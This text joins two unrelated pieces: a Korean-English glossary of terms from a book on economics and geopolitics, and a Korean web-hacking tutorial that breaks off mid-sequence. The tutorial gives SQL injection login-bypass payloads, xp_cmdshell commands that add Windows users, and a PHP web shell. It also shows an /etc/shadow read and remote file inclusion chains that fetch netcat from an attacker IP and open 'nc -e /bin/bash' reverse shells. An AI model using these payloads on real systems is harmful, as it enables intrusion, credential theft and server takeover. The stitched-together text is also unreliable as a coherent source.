- Institute for Advanced Study : 프린스턴 고등연구소

- urbanization : 도시화

- penny press(페니 프레스) : 시계, 가구, 안경, 벽지, 식기, 기성복 등 수없이 많은 제품이 공장에서 만들어져 쏟아지고, 이를 취급하는 시장이 속속 등장하면서 생겨난 것으로 다수의 독자를 겨냥한 광고를 실은 저가(1부당 1페니)의 간행물

- personalization : 개인화

- Beanie Babies(비니 베이비) : 개별적 디자인으로 캐릭터의 이름과 생년월일, 메시지 등이 제각기 다른 봉제 동물 인형 시리즈. 한정 디자인, 한정 판매라는 전략 때문에 처음 5달러에 불과했던 인형 가격이 수백 달러까지 높아진 경우도 있다.

- priceline(프라이스라인) : 브랜드를 따지지 않는 구매자가 원하는 가격을 게시하면 판매자가 이들에게 다가가는 역경매(reverse auction)

- The Audience of One : 일인 관객

- The End of the Mass Market : 대량시장의 종말

- fragmentation : 분화

- marketization : 시장화

- de-marketization : 탈시장화

- cybermart : 사이버 시장

- e-commerce : 전자상거래

- B2B(Business to Business) : 기업간 직접 거래


40. Running Tomorrow's Money : 미래의 화폐

- cashiering : 현금 출납

- currency market : 통화시장

- The Closing Bell(클로징 벨) : 장 마감을 알리는 벨

- para-money(의사 화폐) : 공식 화폐의 특징을 일부 또는 전부 가지고 있지만 공식 화폐는 아닌 수많은 대안적 화폐

- gray market(회색시장) : 암시장과 보통 시장의 중간 시장

- Fortune 500(포춘 500) : <포춘> 이 매년 선정하는 미국 및 해외의 상위 500대 기업

- Xinhua 500(신화 500) : 중국이 미국을 제치고 세계 초강대국으로 부상하면 포춘을 대신해 중국 국영 신화통신이 선정하게 될 500대 기업

- float : 수익

- batch production : 일괄 생산

- barter : 물물교환

- alpaca(알파카) : 남미산 야마의 일종

- countertrade(연계 무역) : 수출을 조건으로 수입을 허용하는 무역 거래로 대응 무역 또는 조건부 무역이라고도 함

- volatility : 변동성

- coincidence of needs : 필요의 일치

- portfolio work(포트폴리오 노동) : 자영업의 한 형태로 다양한 기업이나 클라이언트를 위해 여러 가지 프로젝트를 수행하며 경력에 대한 포트폴리오를 구축해 나가는 새롭고 유연한 노동 형태

- open-source : 공개 소스


제9부 Poverty : 빈곤

41. The Old Future of Poverty : 빈곤의 미래

- river blindness(기생충성 시력 상실증) : 흡혈 암컷 검은 파리에 의해 전파되는 질병으로 시력 장애 또는 실명을 일으키는 병

- development : 개발

- modernization(현대화) : 낮은 생산력과 저부가가치 농업에서 높은 생산력으로 저기술 제조업과 이를 지원하는 서비스업 쪽으로 노동력과 경제체제를 전환하기 위한 전략

- small is beautiful : 작은 것은 아름답다

- chain reaction : 연쇄효과

- Unimation(유니메이션) : 범용(universal) + 자동제어(automation)

- Japanese Evaluation Center : 일본평가센터

- spillover effect(스필오버 효과) : 어떤 요소의 생산 활동이 그 요소의 생산성 또는 다른 요소의 생산성을 증가시켜 경제 전체의 생산성을 올리는 효과

- leakage : 누출

- trickle-down(트리클 다운) : 낙수효과라고도 하며 부유층의 소비 증가가 저소득층의 소득 증대로 연결돼 전체적인 경기 부양 효과가 나타나는 현상

- Luddite(러다이트 운동) : 산업혁명 당시 기계 파괴 운동을 벌였던 러드의 이름에서 유래


42. Twin Tracks to Tomorrow : 두 마리 토끼를 잡아라

- India 2020 A Vision for the New Millennium(인도 2020, 새 천년의 비전) : 압둘 칼람(A.P.J. Abdul Kalam)공동저자

- connectivity : 연결성

- Congress Party : 인도국민회의

- Insurance Regulatory and Development Authority : 인도의 보험 규제 및 개발 당국

- National Committee on Science and Technology : 국가과학기술위원회


43. Cracking Poverty's Core : 빈곤 해소

- cross-contamination : 이종오염

- Indian Department of Biotechnology : 인도 생명공학부

- Science and Development Network : 과학개발네트워크

- Center for Technology and National Security Policy : 기술 및 국가안보 정책센터

- biomass(바이오매스) : 에너지원으로 이용되는 식물이나 동물 폐기물

- biorefinery : 바이오 정유소

- NRC(National Research Council) : 국가연구위원회

- precision agriculture : 정밀 농업

- Chicago Board of Trade : 시카고 상품거래소

- WRI(World Resources Institute) : 세계자원연구소

- early adopter : 얼리 어답터

- self-reinforcing multifunctional system : 자가 강화 다기능 시스템

- reverse home schooling : 역 홈스쿨링


제10부 The New Tectonics : 지각 변동

44. China's Next Surprise? : 중국은 또다시 세계를 놀라게 할 것인가?

- blue water : 대양해군

- string of pearls : 진주목걸이

- Spratley island : 남사군도

- Paracel island : 서사군도

- The Coming Collapse of China(중국의 몰락) : 고든 창(Gordon G. Chang)

- wave conflict : 물결 분쟁

- industry bias(산업화 정책) : 농지에 거주하는 농민들을 쥐어짜고 굶겨 죽이는 수단까지 동원해서 산업 발달을 위한 자본을 확보하는 정책

- People's War : 인민 전쟁

- bloody thread : 피 묻은 실

- Shouters : 외치는 자

- Spirit Church : 성령교회

- Disciples Association : 제자회

- White Sun : 하얀 태양

- Holistic Church : 전구교회

- Crying Fraction : 구파

- Three Grades of Servants : 삼반복인

- Eastern Lightning : 동방번개


45. Japan's Next Bamboo Ring : 일본이 넘어야 할 고비

- Invisible Continent : 보이지 않는 대륙 - 오마에 겐이치

- Council on Foreign Relation : 미국 외교문제평의회

- humanoid(휴머노이드) : 인간을 닮거나 인간처럼 행동하는 기계 또는 생명체

- glycobiology(당생물학) : 당의 생물학적 기능을 밝히는 학문

- de-industrialization : 탈산업화

- External Trade Organization : 일본 무역진흥회

- bigger is always better : 큰 것이 좋다

- comeback : 회생

- gender : 성

- christmas cake(크리스마스 케이크) : 미혼 여성들이 휴일이 끝나면 버려진다는 의미로 먹다 남은 케이크에 비유하는 부정적인 용어

- Silver Wave : 고령화 물결

- economics of aging : 노인의 경제학

- ODA(Offical Development Assistance) : 공적개발원조


46. Korea's Collision with Time : 한반도의 시간과의 충돌

- Sunshine Policy : 햇볕정책

- Perestroika(페레스트로이카) : 구조조정


47. Europe's Lost Message : 유럽이 잃어버린 교훈

- United States of the West : 서구 합중국

- transparency : 투명성

- NFTC(National Foreign Trade Council) : 전미대외무역위원회

- grid computing(그리드 컴퓨팅) : 네트워크를 통해 수많은 컴퓨터를 연결해 컴퓨터의 계산 능력을 극대화한 차세대 디지털 신경망 서비스

- European Space Agency : 유럽 항공우주국

- Maastricht Treaty(마스트리히트 조약) : 유럽의 정치, 경제, 통화 통합을 위한 유럽 통합 조약으로서 1991년 12월 체결

- Bill of Rights : 권리 선언

- flexible scheduling : 근무제도

- slow food : 슬로우 푸드

- European Commission : EU위원회

- GMBH : 유한책임회사(독일)

- AG : 주식회사(독일)

- Drang nach Osten(드랑나흐오스텐) : 동방 팽창정책

- heartland : 심장지대

- Lisbon Agenda : 리스본협약

- After the Empire(제국의 몰락) : 엠마뉴엘 토드(Emmanuel Todd) 2004년 저작


48. Inside America : 미국의 내부 정세

- plug in plug out job : 조립 직업

- DoT(Department of Transportation : 미국 교통부

- intelligent transportation : 지능형 교통

- information superhighway : 정보고속도로

- FASB(Financial Accoun-ting Standards Board) : 미국 재무회계기준심의회

- stealing the future : 미래 훔치기

- Out of Our Minds : Learning to be Creative(지성으로부터의 해방 : 창조성 배우기) : 캔 로빈슨 경(Sir Ken Robinson)

- magnet school(마그넷 스쿨) : 뛰어난 설비와 교육 과정을 갖춘 공립학교

- home-teaching : 가정교육


49. Outside America : 미국의 외부 정세

- hegemon : 패권국

- most unsordid act in history(역사상 가장 비이기적 행동) : 윈스턴 처칠이 마셜 플랜(Marshall Plan)을 두고 한 말

- homogeneity : 균일화


50. The Unseen Game of Games : 보이지 않는 게임 중의 게임

- level playing fields : 공정한 운동장

- nation-state : 국민국가

- nano-disease : 나노 질병

- nano-pollution : 나노 오염

- transhuman : 변형인간

- World Christian Encyclopedia : 세계 기독교 사전

- School of Advanced Studies in Social Science : 파리 사회과학 고등연구소

- Wahabism(와하비즘) : 이슬람 원리주의를 이어받은 보수주의 운동

- Arab Fund for Economic and Social Development : 경제사회개발 아랍펀드

- multipolar : 다극적

- unipolar : 단극적

- agility : 민첩성


프롤로그는 이미 과거이다

* 비관론자가 천체의 비밀이나 해도에 없는 지역을 항해하거나 인간 정신세계에 새로운 지평을 연 사례는 단 한 번도 없다 - 헬렌 켈러

* 비관론자는 어떤 전누에서도 승리하지 못했다 - 드와이트 아이젠하워

- intelligent-design(지적 설계) : 진화론을 넘어서 생물학적 복잡성은 어떤 지적 원인에 의해 설계되었다는 이론

- subjectivism : 주관주의

- unpaid value : 판매되지 않는 가치

- Btu(비티유) : 1Btu는 약 252.04칼로리를 의미하는 열량 단위

- Pre-Raphaelism(라파엘로전파) : 르네상스의 화가 라파엘로 이전의 화풍으로 돌아가자는 주장

[Linux] Web Hacking (Linux Server Security)

1. Web Application Vulnerability


- 최초의 웹 페이지는 정적(static)이었다. 즉, 모든 사람들이 누군가에 의해 만들어진 똑 같은 페이지만을 볼 수가 있었다. 대표적인 웹 언어로 분량이 많지 않고 부담이 적은 HTML이 있다. HTML(Hyper Text Markup Language)은 단순하고 직설적이며 어려운 개념이 거의 포함되어 있지 않다.

- 현재의 웹 페이지들은 상호작용을 하며 동적 데이터를 갱신하고 복잡한 그래픽 화면에 필요한 동작들을 한다. 대표적인 예로 JSP, ASP, PHP등이 있다. 이러한 웹 페이지를 동적(dynamic) 웹 페이지라고 한다. 동적 웹 페이지는 사용자가 입력한 값에 따라서 서버에서 사용자에게 보여주는 페이지가 달라진다.

- OWASP(Open Web Application Security Project) http://www.owasp.org


2. SQL Injection

2.1 General SQL Injection

- SQL injection 은 웹 페이지를 통해서 입력하는 것처럼 SQL query/command를 삽입하기 위한 트릭이다.

- 기본적인 로그인 페이지에서 아이디와 패스워드를 입력하는 부분은 다음과 같다.

<form method=POST name=login action=login_ok.asp>
<input type=text name=id>
<input type=text name=pass>
</form>

- 우리가 입력하는 아이디와 비밀번호 값은 각각 id과 pass에 입력되어 login_ok.asp로 넘겨져 처리된다.

- login_ok.asp에는 우리가 입력한 값을 데이터베이스에서 비교하여 정상적인 사용자인지 확인을 하게 된다. 이 때 login_ok.asp 파일 내에 있는 SQL 구문의 기본적인 형태는 다음과 같다.

SELECT name FROM user WHERE id=’$id’ AND pass=’$pass’;

- 여기서 $id와 $pass는 우리가 입력한 아이디와 비밀번호 값이 들어가게 된다. 아이디에 test 비밀번호에 1234를 입력하면 다음과 같은 식이 성립하게 된다.

SELECT name FROM user WHERE id=’test’ AND pass=’1234’;

- 만약 아이디와 비밀번호 입력란에 정상적인 문자열이 아닌 특수문자가 들어간 문자열을 입력하면 전혀 다른 결과가 나오게 된다. 예를 들어 아이디 입력란에 ’(외따옴표) 만 입력하였을 경우login_ok.asp에서는 다음식을 가지고 결과를 처리하게 된다.

SELECT name FROM user WHERE id=’’’ AND pass=’’;

- 분명 에러가 발생한다. 먼저 외따옴표의 개수가 짝을 이루지 못하여 SQL 구문이 엉키게 된다. 사이트에 따라서 에러 구문을 보여주기도 하고 혹은 미리 지정된 에러 페이지가 보일 수도 있다. 현재 대부분의 사이트들은 자바스크립트를 같이 쓰기 때문에 비밀번호 부분에 값이 입력되지 않았으니 입력하라고 나온다.

- 이번에는 위의 SQL 구문에 아이디와 비밀번호 입력란에 다음과 같은 문자를 입력해보자.

$id = ‘ or 1=1 --
$pass = 1111 (아무런 값이나 상관없음)

- 위의 값을 입력하게 되면 다음과 같이 SQL 구문이 완성이 된다.

SELECT name FROM user WHERE id=’’ or 1=1 --’ AND pass=’1111’;

- SQL 구문은 참이 되므로 구문의 결과값인 user 테이블에서 일치하는 사용자의 이름(name)을 반환하게 된다. 만약 SQL 구문이 사용자 로그인에 관련된 구문이라면 정상적인 사용자로 로그인이 가능하게 된다. $id = admin’ or 1=1 -- 이라고 입력하게 되면 현재 데이터베이스에 admin이라는 사용자가 있다면 admin 사용자로 로그인이 되게 된다. -- 는 MS-SQL에서 사용되는 주석처리 구문이다. 따라서 위의 구문은 -- 이후의 구문은 무시되고 1=1 이라는 식의 참과 id=’’ 의 거짓이 or 연산을 하여 참이 되므로 정상적으로 로그인이 가능한 것이다. 그리고 종종 -- 는 #으로 대체할 수가 있다. 현재 다수의 웹 서버 응용프로그램들은 클라이언트에 의해서 입력된 값을 검사하지 않고 SQL을 구문을 수행하기 때문에 이와 같은 취약점이 존재하게 된다. (Input Validation)

- SQL 구문에서 -- 을 주석으로 처리하지 않을 때의 상황을 생각해보자. 이런 경우에는 아이디 입력란과 비밀번호 입력란에 모두 SQL 구문을 혼돈시키는 문자열을 입력해야 한다. 다음과 같이 입력해 보자.

$id = ‘ or ‘1’=’1
$pass = ‘ or ‘1’=’1

SELECT name FROM user WHERE id=’’ or ‘1’=’1’ AND pass=’’ or ‘1’=’1’;

- 위와 마찬가지로 이번에도 참이 된다. ‘1’=’1’이라는 식이 참이 되고 or 연산을 하기 때문에 결과적으로 참이 되는 것이다.

- 첫번째 주석처리 구문을 삽입하는 방법은 주로 ASP와 MS-SQL되어 있는 사이트에서 많이 사용되고 두번째 방법은 PHP로 되어 있는 사이트에서 많이 사용되고 ASP와 MS-SQL로 되어 있는 사이트에서도 사용된다.

- 다음은 위의 두 가지 방법 이외에 우리가 입력해 볼 수 있는 다른 방법들이다.

“ or 1=1 --
or 1=1 --
‘” or “1”=”1
‘) or (‘1’=’1

- 이번에는 약간 다른 상황을 생각해보자. 아이디와 비밀번호 입력란에 특수문자를 쓸 수 없도록 되어 있을 경우 HTML 폼에 입력하지 않고 URL을 우리가 원하는 값으로 완성시켜 서버에게 전송하게 할 수 있다. URL encoding을 이용하여 특수문자들을 URL 형태에 맞게 변환하여 보낼 수 있다.

- 다음은 예제에서 사용될 login.cgi 파일 중 아이디와 비밀번호를 검사하는 부분이다.

URL = HTTP.GetFromUser()
user_id = URL.parameter(“user_id”)
password = URL.parameter(“password”)
query = “SELECT name FROM userlist WHERE uid=’” + user_id + “’ AND pwd=’” + password + “’;”
database.connect()
result = database.execute(query)
if result
HTTP.Send(“Login successful. Welcome, ” + result)
IsAuthenticated = true
else
HTTP.Send(“User ID or password is incorrect.”)
IsAuthenticated = false
end if
if IsAuthenticated
HTTP.Send(MainMenu)
end if

- 이 파일에게 다음과 같은 URL을 보낼 때는 다음과 같이 보낼 수 있다.

https://website/login.cgi?user_id=dcooper&password=’%20OR%20’’%3d’

- 웹 브라우저 위와 같이 입력하게 되면 login.cgi라는 파일에게 id=dcooper과 password=’%20OR%20’’%3d’ 라는 값을 전달하게 된다. 이 URL이 서버에게 전달되게 되면 서버는 SQL 쿼리문에서 다음과 같이 처리를 한다.

SELECT name FROM userlist WHERE uid=’dcooper’ AND pwd=’’ OR ‘’=’’;

- 이 쿼리문은 userlist 테이블에서 사용자가 dcooper인 레코드에서 name 값을 가져와서 반환하게 된다. 이렇게 URL을 이용하여 입력되어서는 안되는 문자들을 서버에게 전송할 수도 있다.

- 위와 유사하게 사용될 수 있는 URL들을 몇 개 더 보면

https://website/login.cgi?user_id=dcooper&password=foo%20OR%201%3d1
SELECT name FROM userlist WHERE uid=dcooper AND pwd=foo OR 1=1;

https://website/login.cgi?user_id=’%20OR%20’’%3d’&password=’%20OR%20’’%3d’
SELECT name FROM userlist WHERE uid=’’ OR ‘’=‘’ AND pwd=’’ OR ‘’=‘’;

https://website/login.cgi?user_id=%25’;--
SELECT name FROM userlist WHERE uid=’%’;--’ AND pwd=’’;

%20은 공백을 뜻하고 %3d는 = 을 뜻한다.
%25는 %를 뜻한다.


2.2 Reverse-Engineering

- 로그인 페이지에서 아이디와 비밀번호 입력시 8글자 이상을 입력하지 못하도록 코드를 작성할 수가 있다. 이러한 경우 우리가 이전에 사용했던 ‘ or ‘1’=’1이나 ‘ or 1=1 -- 의 방법은 8글자를 넘어가므로 공격이 불가능하다. 하지만 완전히 불가능한 것은 아니다. HTML 태그는 웹 페이지 소스보기를 하면 보이므로 이를 수정하여 8글자 이상을 입력하는 것이 가능하다.

- 다음은 입력 폼에 최대 8글자만 입력이 가능하도록 하게 하는 HTML 폼이다.

<form method=post name=loginform action=loginok.asp>
...
<input type=”text” name=”userid” size=8 maxlength=8 class=”input_basic”>
<input type=”passwd” name=”userpass” size=8 maxlength=8 class=”input_basic”>

- 위와 같이 8글자 이상은 입력이 안된다. maxlength가 8이기 때문에 사용자가 입력할 때 8글자가 최고이다. 우리는 이 maxlength 부분은 충분히 늘려준 다음 자신의 컴퓨터에 저장을 한다. 로컬 컴퓨터로 저장하는 이유는 우리가 서버의 내용을 직접 수정하지 못하기 때문이다. 그리고 한가지 더 수정해야 하는 부분은 action 부분이다. 이 input 태그의 값을 전달해주는 파일이 action에 지정된 파일이다. action 부분은 form 태그에 속한 값으로서 form 태그는 input 태그보다 먼저 나온다.

- 개발자마다 다르겠지만 보통 action에 지정된 파일은 상대경로를 쓴다. 이 파일을 로컬 컴퓨터에 저장을 하게되면 action에 지정된 파일은 상대경로가 아닌 URL을 포함한 절대경로를 써주어야만 우리가 입력한 값을 정상적으로 전달할 수 있다.

- 위의 form태그와 input 태그는 다음과 같이 수정하여 로컬 컴퓨터에 login.html로 저장을 하자.

<form method=post name=loginform action=http://www.domain.com/loginok.asp>
...
<input type=”text” name=”userid” size=20 maxlength=20 class=”input_basic”>
<input type=”passwd” name=”userpass” size=20 maxlength=20 class=”input_basic”>

- 이렇게 해서 우리가 원하는 문자열을 입력할 수가 있다. 만약 위처럼 ‘ or 1=1 -- 로 입력을 한 이유는 이 사이트가 ASP로 되어 있기 때문이고 이 방법이 안될 경우 ‘ or ‘1’=’1로 입력을 해보아도 된다. 이 방법은 리버스 엔지니어링 중 가장 간단한 방법이다.

- ‘ 을 입력하였을 경우 화면에 보여지는 에러 메시지를 보고 공격을 하는 리버스 엔지니어링은 다음가 같다.

- 먼저 아이디와 비밀번호 입력란에 위에서 배웠던 방법을 사용하여도 되고 혹은 외따옴표(‘)만 입력해보아도 된다. 리버스 엔지니어링의 핵심은 정상적이지 않은 입력을 통해 화면에 보여지는 에러 메시지를 보고 정상적인 것처럼 보이는 입력을 찾아내는 것이다. 따라서 이 방법은 여러 번의 시행착오를 거쳐야 하는 상황이 발생할 수 있고 모든 방법을 모두 적용시켜도 공격이 이루어지지 않을 수도 있다.

- ‘ or 1=1 -- 와 1111을 입력했을 때 나타나는 에러 메시지에서 유심히 보아야 할 부분은 다음과 같다.

'id = '' or 1=1 --' and pwd = '1111''

- 이 부분에서 에러가 발생하였다고 나와있다. 이 문장에서 우리가 입력했던 문장을 변수로 대치시키면 SQL 쿼리문을 도출해낼 수가 있다. 쿼리문은 다음과 같다.

SELECT user FROM userlist WHERE ‘id=’$id’ and pwd=’$pass’’

- 지금까지 보았던 구문과 약간 다른 점이 있다 조건이 들어가는 부분을 ‘ ‘ 로 한번 더 묶었다는 것을 알 수가 있다. 그리고 에러 메시지에서 보면 외따옴표의 개수가 짝이 맞지가 않다. 이것은 우리가 입력하는 문자열에 외따옴표가 하나 더 들어가거나 덜 들어가게 해서 짝을 맞추어 주어야 한다는 것을 의미한다. 그리고 에러 메시지에서 -- 이 주석처리가 되지 않고 있음을 알 수가 있다. 따라서 ‘ or 1=1 -- 방법은 공격이 되지 않을 것이라는 것을 추측할 수가 있다.

- ex)

select userName from users where userName='' or users.userName like 'a%' --' and userPass=''
Username: ' or 1=1; drop table users; --
Password: [Anything]
Username: '; shutdown with nowait; --
Password: [Anything]
select userName from users where userName=''; exec master..xp_cmdshell 'iisreset'; --' and userPass=''

- admin 계정으로 들어가기 위해서 [ table명.field명 like ‘a%’ -- ] 을 입력하는 방법도 있다.
그 외에 테이블 삭제, DB 종료, 시스템 명령 실행등의 동작이 가능하기도 하다.


2.3 MS MSQL Stored Procedures

- MS SQL 서버에는 SQL서버 관리의 편의를 위해 설치된 몇몇 프로시저 들이 있는데 특히 xp_cmdshell은 관리자 권한으로 명령이 실행되므로 사용자 추가 등의 시스템 명령이 실행 가능한 프로시저이다.
만약 의견을 적을 수 있는 게시판을 이용해서 다음과 같이 입력할 수 있다.

‘ exec master..xp_cmdshell ‘net user newusername newuserpassword /ADD’--

- 이 입력이 들어가는 쿼리문은 다음과 같다.

SELECT * from MyTable WHERE someText=’’ exec master..xp_cmdshell ‘net user newusername newuserpassword /ADD’--‘

- 이는 URL을 이용해서도 가능하다. 위의 명령어는 xp_cmdshell 명령어를 이용하여 NT/2000 윈도우의 cmd.exe를 웹 서버 루트로 복사를 하는 내용이다.

http://10.10.10.10/showtable.asp?ID=3;%20EXEC+master..xp_cmdshell+ ‘copy+\winnt\system32\cmd.exe+\inetpub\scripts’

- MS SQL의 이 취약점을 이용하여 공격하는 하나의 시나리오를 만들어 보면


- 위와 같이 IIS 5.0에 MS-SQL을 탑재하고 있는 Windows 2000 Server가 공격 대상이다.
이 공격에서 우리는 웹 브라우저만을 가지고 서버의 관리자 권한을 획득할 것이다. 위에 보이는 URL이 우리가 사용할 URL 중에서 공통적인 부분이다.

- 먼저 공격대상에서 netcat이라는 통신프로그램을 전송할 것이다. netcat을 전송하기 위해서 서버에서 TFTP를 실행시켜 공격자가 인증 없이 서버에 파일을 보낼 수 있게 한다.
netcat이 위치할 곳은 C:\ 이고 netcat의 업로드가 완료되면 cmd.exe 파일을 IIS의 DocumentRoot에 복사한다.

- 그리고 netcat을 이용하여 특정 포트를 연 다음 공격자는 netcat을 이용하여 접속하게 되면 command 제어권을 얻을 수 있다. 이 때 방화벽에 의해 특정 포트 이외에 모두 막혀 있을 경우 공격자가 netcat을 listen 상태로 두고 공격대상에 공격자에게 연결을 하게 만들면 된다.

http://10.10.10.10/test.asp?id=3;%20EXEC master..xp_cmdshell ‘tftp –i
192.168.0.8 GET nc.exe C:\nc.exe
http://10.10.10.10/test.asp?id=3;%20EXEC master..xp_cmdshell ‘copy
\winnt\system32\cmd.exe /inetpub/scripts’
http://10.10.10.10/test.asp?id=3;%20EXEC master..xp_cmdshell ‘c:\nc.exe
–l –p 6666 –e cmd.exe
Hacker # nc 10.10.10.10 6666

- 마지막으로 maxlength가 아닌 자바 스크립트로 문자열을 체크하는 경우가 있다. 이런 경우 두 가지로 부류할 수 있는데 하나는 서버 측에서 문자열을 체크하는 것이고 다른 하나는 클라이언트 측에서 문자열을 체크하는 것이다. 클라이언트 측에서 문자열을 검사하게 되면 공격자가 문자열 검사 스크립트를 제외시킬 수 있고 그렇게 되면 결과적으로 문자열을 검사하지 않고 sql injection 공격을 할 수 있게 되는 것이다. 다음은 HTML 코드 안에 속해있는 로그인 스크립트 부분이다.

function login()
{
var form = document.login;
if (form.mem_id.value == "")
{
alert("ID를 입력해 주십시오");
form.mem_id.focus();
return ;
}
if (form.mem_pwd.value == "")
{
alert("비밀번호를 입력해 주십시요");
form.mem_pwd.focus();
return ;
}
var id_check = "";
var temp6 = "";
id_check = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; // 문자열 체크를 위한 문자열 나열
if ( form.mem_id.value ) { // 문자열 체크를 위한 코드
for ( var i = 0 ; i < form.mem_id.value.length ; i++ ) {
temp6 = form.mem_id.value.substring(i, i+1);
if ( id_check.indexOf(temp6) == -1 )
{
alert("아이디에는 숫자와 영문자 이외에는 \n\n사용하실 수 없습니다.");
form.mem_id.value = "";
form.mem_id.focus();
return;
}
}
}
form.submit();
}

- 여기에서

var id_check = "";
var temp6 = "";
id_check = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; // 문자열 체크를 위한 문자열 나열
if ( form.mem_id.value ) { // 문자열 체크를 위한 코드
for ( var i = 0 ; i < form.mem_id.value.length ; i++ ) {
temp6 = form.mem_id.value.substring(i, i+1);
if ( id_check.indexOf(temp6) == -1 )
{
alert("아이디에는 숫자와 영문자 이외에는 \n\n사용하실 수 없습니다.");
form.mem_id.value = "";
form.mem_id.focus();
return;
}
}
}

- 부분이 문자열을 검사하는 부분이다. 아이디와 비밀번호의 입력값 검사를 할 때 지정된 문자열이 아니면 잘못된 문자열이라고 경고를 알리게 된다. 이 부분을 삭제하게 되면 문자열 검사를 하지 않고 공격자가 입력하는 값을 그대로 받아들이게 된다.

- 위 부분을 삭제하고 마찬가지로 로컬 컴퓨터로 저장해서 실해하게 되면 문자열을 검사하지 않게 된다.
물론 이 때 form 태그에 action 부분은 절대경로를 넣어주어야지만 정상적으로 값을 전달할 수 있다.


3. File Injection

- 내부 명령어를 실행하는 코드가 있는 파일을 생성하고 공격하고자 하는 홈페이지의 자료실 등에 파일을 업로드한 후 업로드한 파일의 절대경로를 찾아내어 파일을 실행시킨다. (.php .php3 .inc .asp .pl .cgi)

- 다음은 WEB 상에서 쉘과 같은 기능을 할 수 있는 PHP 코드이다.

<?
$command=str_replace("\\","",$command);
$result=`$command`; $info = ereg_replace("\n","","[".`whoami`."@".`pwd`."]");
echo "<hr><form action=$PHP_SELF method=post>
$info <input type=text name=command value='$command' size=40>
<input type=submit value='go'></form><hr>\n
<xmp>\n$result\n</xmp><hr>";
?>


4. Query를 이용한 내부명령어 실행

- 대부분의 컴퓨터용 언어에는 시스템내의 운영체제상의 명령어를 손쉽게 실행시킬 수 있는 함수를 제공한다. Server Side Include와 같은 언어도 마찬가지이다.
이중 PHP에서는 passthru, system 혹은 php파일을 곧장 불러 실행할 수 있는 fpassthru 함수가 제공된다.

- 만약 아래와 같은 구문이 있다면 어떤 일이 벌어질까?

<? passthru(date); ?>

- 해당 페이지를 브라우저로 열어보면 유닉스의 date 명령에 대한 실행결과가 나타남을 확인할 수 있다.

- ex)

1. 먼저 웹 서버가 실행되어 있는지 확인 한다.

# ps –ef | grep http

2. 웹 서버가 실행되어 있지 않으면 웹 서버 데몬을 실행시킨다.

# /etc/rc.d/init.d/httpd start

3. head 명령을 실행하는 test.php 파일을 생성한다.

# cd /var/www/html
# vi test.php
<html>
<body>
<h1>TEST2 PAGE</h1>
<? passthru(‘head /etc/shadow’); ?>
</body></html>
# chmod 4755 /usr/bin/head

4. 브라우저를 열어 결과 페이지를 확인해 본다.

http://your_ip/test.php

5. 브라우저를 통해 현재 접속되어 있는 사용자의 아이디가 무엇인지 확인해 본다.
(passthru 함수부분 수정)


5. Reverse Telnet



- 공격자에 의해 원격지에서 파일의 명령이 실행되는 가장 큰 이유는 개발자들의 편의만을 생각한 개발에 있다. 개발 당시 좀 더 빨리 좀 더 편하게 하기 위해 보안상 문제가 되는 부분을 소홀히 지나갔기 때문에 이런 공격이 이루어지게 되는 것이다.

- 예를 들어 PHP 코드 중에 다음과 같은 구문이 있다면 원격지에서 파일의 명령 실행이 가능하다.

<? include $file; ?>
<? passthru($cmd); ?>

- 첫 번째의 경우 우리가 흔히 볼 수 있는 코드이고 두 번째 코드는 흔히 볼 수 없는 코드이다. passthru의 경우 흔히 볼 수는 없지만 공격자가 임의적으로 이런 파일을 만들어 게시판 같은 곳에 업로드를 하게 되면 $cmd에 의해서 공격자가 원하는 명령을 실행하고 그에 대한 결과를 받아 볼 수 있다.

- 공격이 가능한 하나의 시나리오를 보면

- 먼저 공격대상의 게시판 소스코드를 획득한 후 코드를 분석하던 중 include $file 이라는 부분을 찾아냈다. 이 코드가 포함되어 있는 파일이 login.php 라고 하고 공격자는 test.php라는 파일을 아래와 같이 만든다.

# vi test.php
<? passthru($cmd); ?>

- 그리고 웹 브라우저에서 다음과 같은 URL을 입력한다.

http://10.1.1.9/bbs/login.php?file=http://61.240.10.9/test.php?cmd=ls -al

- 이렇게 해서 화면에 유닉스 명령인 ls -al의 결과가 보인다면 이 서버는 원격지 파일의 명령 실행 공격에 대해 취약하다는 것을 알 수 있다.

- 원하는 명령에 대한 결과를 보고자 하는 경우 매번 브라우저에 입력을 해야 한다. 그렇게 되면 번거럽기도 하겠지만 웹 서버의 access_log에 우리가 입력했던 URL이 모두 남게 된다.

- 그래서 이번에는 netcat 이라는 프로그램을 이용하여 공격대상의 터미널을 리버스로 공격자에게 열어주는 방법을 사용해보면 (공격대상과 공격자 모두 리눅스 시스템을 사용하고 있다고 가정)

[terminal]
# nc -l -p 8888

[web browser]
1. http://10.1.1.9/bbs/login.php?file=http://61.240.10.9/test.php?cmd=cd /tmp
2. http://10.1.1.9/bbs/login.php?file=http://61.240.10.9/test.php?cmd=wget http://61.240.10.9/nc
3. http://10.1.1.9/bbs/login.php?file=http://61.240.10.9/test.php?cmd=chmod 777 /tmp/nc
4. http://10.1.1.9/bbs/login.php?file=http://61.240.10.9/test.php?cmd=/tmp/nc -e /bin/bash 61.240.10.9 8888

- netcat이 정상적으로 실행되었다면 공격자의 터미널 창에 연결이 되었음을 나타내는 메시지가 보일 것이다. 그런데 만약 공격대상 서버에 wget 이라는 프로그램이 없다면 위와 같은 공격은 되지 않을 것이다. 이 경우 ftp를 이용하여 공격대상 서버가 공격자의 서버에 접속하여 netcat을 다운로드 하도록 할 수가 있다. ftp에 대한 명령어들이 들어 있는 파일을 생성해서 공격대상의 서버에서 실행하면 받을 수 있다.

[공격자]
# cat > ftpdown.txt
open 61.240.10.9 // nc를 다운 받을 ftp 사이트 주소
user hacker hacker // id & password
bin // 바이너리 모드로 전환
get nc //nc 다운로드
quit // 접속종료
^D

# nc -l -p 8888

[공격대상]
# ftp -n < ftpdown.txt // ftpdown.txt에 있는 내용을 한 라인씩 읽어서 ftp 실행

- 그러나 이 경우 ftpdown.txt라는 파일을 공격대상 서버에 업로드 하는 일도 힘들 경우 웹 브라우저를 통해 위의 과정을 모두 처리할 수 있다.

http://10.1.1.9/bbs/login.php?file=http://61.240.10.9/test.php?cmd=cd /tmp
http://10.1.1.9/bbs/login.php?file=http://61.240.10.9/test.php?cmd=echo open 61.240.10.9 > /tmp/ftpdown.txt
http://10.1.1.9/bbs/login.php?file=http://61.240.10.9/test.php?cmd=echo user hacker hacker >> /tmp/ftpdown.txt
http://10.1.1.9/bbs/login.php?file=http://61.240.10.9/test.php?cmd=echo bin >> /tmp/ftpdown.txt
